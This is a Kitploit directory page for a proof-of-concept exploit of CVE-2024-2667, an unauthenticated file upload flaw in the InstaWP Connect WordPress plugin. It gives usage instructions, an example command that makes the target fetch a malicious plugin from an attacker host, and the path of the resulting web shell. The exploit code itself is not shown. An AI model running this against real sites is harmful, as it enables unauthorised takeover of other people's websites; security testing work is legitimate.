Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-2667-Poc | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-2667-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubnxploited/cve-2024-2667-poc

CVE-2024-2667-Poc

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-2667-Poc 🚀

Description

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

Script Usage Guide ⚙️

Install Requirements

DescriptionDetailsIcon
Install Required LibrariesUse pip to install the necessary Python libraries: requests and beautifulsoup4.🛠️
Command to InstallRun: pip install requests beautifulsoup4.📥

Run the Script

Check Vulnerability

Shell Location

DescriptionDetailsIcon
Shell PathIf the upload is successful, the shell will be accessible at:🐚
wp-content/plugins/instawp-connect/shell.php.

usage -help

root@kitploit:~
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

options:
  -h, --help            show this help message and exit
  -up URL_PLUGIN, --url_plugin URL_PLUGIN
                        URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
  -u URL_TARGET, --url_target URL_TARGET
                        URL of the target WordPress site (e.g., http://victim-domain/).
Download Tool
DescriptionDetailsIcon
Execute the ScriptRun the script using the command line with required arguments.🚀
Required Arguments- -up: Plugin URL (e.g., http://attacker-domain/malicious-plugin.zip).
- -u: Target WordPress URL (e.g., http://victim-domain/).🔧
Example Commandpython CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/📜
DescriptionDetailsIcon
Version CheckThe script examines the readme.txt file for the version of the target plugin.🔍
Vulnerable VersionIf the version is <= 0.1.0.22, the script prints: The site is vulnerable.⚠️
Safe VersionIf the version is > 0.1.0.22, the script prints: The site is not vulnerable.✅